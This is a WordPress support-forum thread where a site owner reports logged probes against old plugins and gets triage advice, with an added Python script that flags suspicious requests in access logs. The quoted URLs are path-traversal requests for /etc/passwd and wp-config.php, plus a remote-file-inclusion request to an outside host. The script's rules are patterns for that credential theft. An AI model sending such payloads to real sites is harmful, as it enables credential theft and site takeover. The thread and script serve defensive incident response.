• Resolved steve986

    (@steve986)


    Hi all,

    Ok I’m based in the UK and I have just checked the Live Traffic and noticed that there are 7 entries from 3 days ago from the Netherlands. These have a green dot next to them and Wordfence has classified them as human, which is a bit concerning as they obviously have had access to the following… (I have removed my domain for obvious reasons).

    http://www ..co.uk/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../ect/passwd

    http://www ..co.uk/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../ect/passwd

    http://www ..co.uk/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/ect/passwd

    http://www ..co.uk/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd

    http://www ..co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd

    http://www ..co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

    http://www ..co.uk/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.relationshiptips.club/cach/db.php

    Any advice on what I should do?

    Steve

    • This topic was modified 3 years, 11 months ago by steve986.
Viewing 8 replies - 1 through 8 (of 8 total)
  • Hey Steve,
    One of the affected plugins (wp-ecommerce-shop-styling) is mine, which I closed around four years ago. I can remember this security issue, but I have fixed it, so if you use the latest version they should not have had access to the files.
    But maybe one of the other attacks did work.
    You can try the URLs one by one to see whether or not the attack delivered the requested files.
    You should definitely not use any plugins that are not supported anymore. Is WP E-Commerce still updated? I haven’t heard of it for years.
    best regards, Hannes

    Thread Starter steve986

    (@steve986)

    Hi Hannes,

    Really appreciate you taking the time to help me out.

    Well, I basically downloaded a template from themeforest (themerex) and it features a woocommerce shop.

    I can only see Woocommerce and that’s up to date. I can’t see a plugin for E-commerce?

    Could you talk me through how I check each of the URLs?

    Many thanks for your time

    Steve

    Copy each of the URLs to your browser and see if you get the requested files so you know what the attacker got.

    Afterwards, please remove all plugins that are not updated anymore.

    Thread Starter steve986

    (@steve986)

    Hey Hannes,

    Thanks for that. Is it safe to paste the links in the browser, or could anything nasty be in them if they have modified the files in any way?

    Steve

    It is not a risk to open the URLs in your browser.
    The URLs try to show your credentials. If any of them works the attacker may have access to your site and you should reinstall and clean up EVERYTHING immediately.

    Thread Starter steve986

    (@steve986)

    Hannes,

    I have checked every one of those links and my security software has blocked me from accessing them, warning me that they are malicious.

    I’ve also noticed that they all have 301 response codes next to the log entries.

    Steve
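
Added example (not part of the original thread, and not Wordfence code): a small triage script that checks web server access-log lines for the kinds of probes listed in the first post and sorts them by response status, so a 301 or 404 is separated from a request that actually returned content. The log format, the sample lines, the host remote.example and the rule names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (common log format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2020:09:14:01 +0000] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd HTTP/1.1" 301 162
203.0.113.7 - - [10/Jan/2020:09:14:02 +0000] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 548
203.0.113.7 - - [10/Jan/2020:09:14:03 +0000] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1873
203.0.113.7 - - [10/Jan/2020:09:14:04 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://remote.example/payload.php HTTP/1.1" 403 199
198.51.100.20 - - [10/Jan/2020:09:15:00 +0000] "GET /wp-content/themes/shop/style.css?ver=5.3 HTTP/1.1" 200 9120
198.51.100.20 - - [10/Jan/2020:09:15:01 +0000] "GET /shop/?orderby=price HTTP/1.1" 200 20411
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
# Heuristic rules (assumed for this example), applied to each URL-decoded parameter value.
RULES = [
    ("traversal", re.compile(r"\.\.[/\\]")),
    ("sensitive-file", re.compile(r"(?:^|/)(?:etc/passwd|wp-config\.php)$")),
    ("remote-url", re.compile(r"^(?:https?:)?//", re.I)),
]

def outcome(status):
    if 200 <= status < 300:
        return "served"      # content was returned: check what the script sent
    if 300 <= status < 400:
        return "redirected"  # redirect only: look for the follow-up request
    return "rejected"        # 4xx/5xx: this request did not return the file

def scan(log_text):
    """Return one finding per log line whose query string matches a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            hits = [label for label, rx in RULES if rx.search(value)]
            if hits:
                findings.append({"ip": ip, "script": url.path, "param": name,
                                 "rules": hits, "status": status,
                                 "outcome": outcome(status)})
                break
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["status"], f["outcome"], f["script"], f["param"], f["rules"])
```

A "redirected" finding only says that this particular response was a redirect; the request to the redirect target appears as its own log line and needs the same check.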

    Hey @steve986,

    I believe @haet is correct (and thanks for chiming in, we appreciate it :)). I was able to find each of these plugins with the exception of simple-image-manipulator. Each one of them is very old, not updated any longer, and even with only a quick glance most have had reported exploits. My best suggestion here is to make a backup, and update your site with software that’s currently supported. I’m sure you can find replacements for each.

    You might even get with a trusted web developer or hack repair service to make sure the site hasn’t been compromised.

    Once you’ve done this we can take a look if you’re still having an issue with Live Traffic. But at this point, with the information you’ve shared (I assume there’s likely more) there are too many other possible contributing factors here.

    Please make a backup, replace the software, and make sure all software on the site is up to date.

    Thanks,

    Gerroald

    Hey @steve986,

    We haven’t heard back from you in a while, so I’ve gone ahead and marked this thread as resolved.

    Please feel free to open another thread if you’re still having issues with Wordfence.

    Thanks,

    Gerroald

  • The topic ‘Live Traffic – Showing someone has accessed files’ is closed to new replies.